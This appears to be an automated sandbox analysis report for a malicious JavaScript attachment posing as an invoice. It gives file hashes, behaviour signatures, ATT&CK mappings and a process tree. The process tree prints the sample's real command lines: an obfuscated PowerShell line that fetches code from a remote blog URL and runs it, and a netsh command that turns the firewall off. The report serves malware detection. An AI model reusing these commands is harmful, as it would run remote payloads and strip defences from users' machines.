Analysis
-
max time kernel
142s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 05:51
Static task
static1
Behavioral task
behavioral1
Sample
invoice_2566246817.js
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
invoice_2566246817.js
Resource
win10v2004-20231127-en
General
-
Target
invoice_2566246817.js
-
Size
106KB
-
MD5
fc6d7a11059fee2eda2bab5e4c82c839
-
SHA1
9907895c521bddd02573ca5e361490f017932dbe
-
SHA256
39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
-
SHA512
1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
-
SSDEEP
384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 5024 powershell.exe 13 5024 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 35 api.ipify.org 36 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 5024 set thread context of 4132 5024 powershell.exe RegSvcs.exe PID 5024 set thread context of 3420 5024 powershell.exe RegSvcs.exe PID 5024 set thread context of 3216 5024 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeRegSvcs.exepid process 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe 4132 RegSvcs.exe 4132 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 5024 powershell.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe Token: SeIncBasePriorityPrivilege 5024 powershell.exe Token: SeCreatePagefilePrivilege 5024 powershell.exe Token: SeBackupPrivilege 5024 powershell.exe Token: SeRestorePrivilege 5024 powershell.exe Token: SeShutdownPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeSystemEnvironmentPrivilege 5024 powershell.exe Token: SeRemoteShutdownPrivilege 5024 powershell.exe Token: SeUndockPrivilege 5024 powershell.exe Token: SeManageVolumePrivilege 5024 powershell.exe Token: 33 5024 powershell.exe Token: 34 5024 powershell.exe Token: 35 5024 powershell.exe Token: 36 5024 powershell.exe Token: SeRestorePrivilege 4288 dw20.exe Token: SeBackupPrivilege 4288 dw20.exe Token: SeBackupPrivilege 4288 dw20.exe Token: SeBackupPrivilege 4288 dw20.exe Token: SeBackupPrivilege 4288 dw20.exe Token: SeBackupPrivilege 4176 dw20.exe Token: SeBackupPrivilege 4176 dw20.exe Token: SeDebugPrivilege 4132 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe Token: SeIncBasePriorityPrivilege 5024 powershell.exe Token: SeCreatePagefilePrivilege 5024 powershell.exe Token: SeBackupPrivilege 5024 powershell.exe Token: SeRestorePrivilege 5024 powershell.exe Token: SeShutdownPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeSystemEnvironmentPrivilege 5024 powershell.exe Token: SeRemoteShutdownPrivilege 5024 powershell.exe Token: SeUndockPrivilege 5024 powershell.exe Token: SeManageVolumePrivilege 5024 powershell.exe Token: 33 5024 powershell.exe Token: 34 5024 powershell.exe Token: 35 5024 powershell.exe Token: 36 5024 powershell.exe Token: SeIncreaseQuotaPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 5024 powershell.exe Token: SeTakeOwnershipPrivilege 5024 powershell.exe Token: SeLoadDriverPrivilege 5024 powershell.exe Token: SeSystemProfilePrivilege 5024 powershell.exe Token: SeSystemtimePrivilege 5024 powershell.exe Token: SeProfSingleProcessPrivilege 5024 powershell.exe Token: SeIncBasePriorityPrivilege 5024 powershell.exe Token: SeCreatePagefilePrivilege 5024 powershell.exe Token: SeBackupPrivilege 5024 powershell.exe Token: SeRestorePrivilege 5024 powershell.exe Token: SeShutdownPrivilege 5024 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 208 wrote to memory of 5024 208 wscript.exe powershell.exe PID 208 wrote to memory of 5024 208 wscript.exe powershell.exe PID 5024 wrote to memory of 4296 5024 powershell.exe csc.exe PID 5024 wrote to memory of 4296 5024 powershell.exe csc.exe PID 4296 wrote to memory of 984 4296 csc.exe cvtres.exe PID 4296 wrote to memory of 984 4296 csc.exe cvtres.exe PID 5024 wrote to memory of 2896 5024 powershell.exe netsh.exe PID 5024 wrote to memory of 2896 5024 powershell.exe netsh.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 4132 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3420 5024 powershell.exe RegSvcs.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 5024 wrote to memory of 3216 5024 powershell.exe Msbuild.exe PID 3216 wrote to memory of 4288 3216 Msbuild.exe dw20.exe PID 3216 wrote to memory of 4288 3216 Msbuild.exe dw20.exe PID 3216 wrote to memory of 4288 3216 Msbuild.exe dw20.exe PID 3420 wrote to memory of 4176 3420 RegSvcs.exe dw20.exe PID 3420 wrote to memory of 4176 3420 RegSvcs.exe dw20.exe PID 3420 wrote to memory of 4176 3420 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))2⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12xfqybz\12xfqybz.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81B3.tmp" "c:\Users\Admin\AppData\Local\Temp\12xfqybz\CSC723BFB4059334DBFB1F69D1CD0DEDCE.TMP"4⤵PID:984
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4288
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5cdee9f0fc587268fe90e164c0545bb90
SHA14ab0a2bbe7033de02de31259ca6dd6beb002c4b7
SHA2563dcb780c1afe9cd6f30151578bd17b3a02633e6ab7fa170170bfc7eee83f4ec4
SHA51296c466c7ce279df2598e14e4b6948e15eb0231d9f2b184f54ac8bf24bc33f104f7332b66e81283143dfb2a9ac0dec38cdaa16510da50115d1e0abb57de437cbd
-
Filesize
1KB
MD54a94028e64a25edc93742d6f3abe6e4f
SHA16de0b9a3f1fc131ac0660b3173e869e0b5d2299c
SHA256c7eba9283d60d0740fe4adef90bfbcc0e51dc7fb4b6bc32399df8a4f3bbc6ce8
SHA512b4eedc61b4d96df347995e8c5cbc8c59388c6b8e4f50ab6ab9d22a519a8706d3d7a6ee4f12db8ced8ad6a5be8e2654273b31e505492294918f0c0b9cdb2ec48c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD535740afef8f235f85d89c8bf1bb8e33f
SHA1b1db4a9178ecdccf1d630deb12d5cbfe49635e52
SHA25692446fcc104cfdc358e2d8b2d26441b2d54dd2d0babf52d1c59ad718ebd2d0c7
SHA512694160a3345870b28fa032cf0e209b9d829877ea4365a738cea53bcdb82ac37973e9a9bc8a284c5f074de00131a5f7375763fe54d787bb17cb078776018a5021
-
Filesize
652B
MD560be265dcff1940f9ef13caa226373c5
SHA17257d86bd983a888270b0891fba09bf8f43fa328
SHA2568e21a202ce2568ffee1217f9d77e347ca0598fdf5d833714c088c1889d36f2f1
SHA5123a11f461b150062c9380548b84333e6712ac36c0e5052f453dc3f54c9992c2e23365213577bc2afe3e8d9be1f591b7b62962e96217e51c06ef861d38c9dc02b3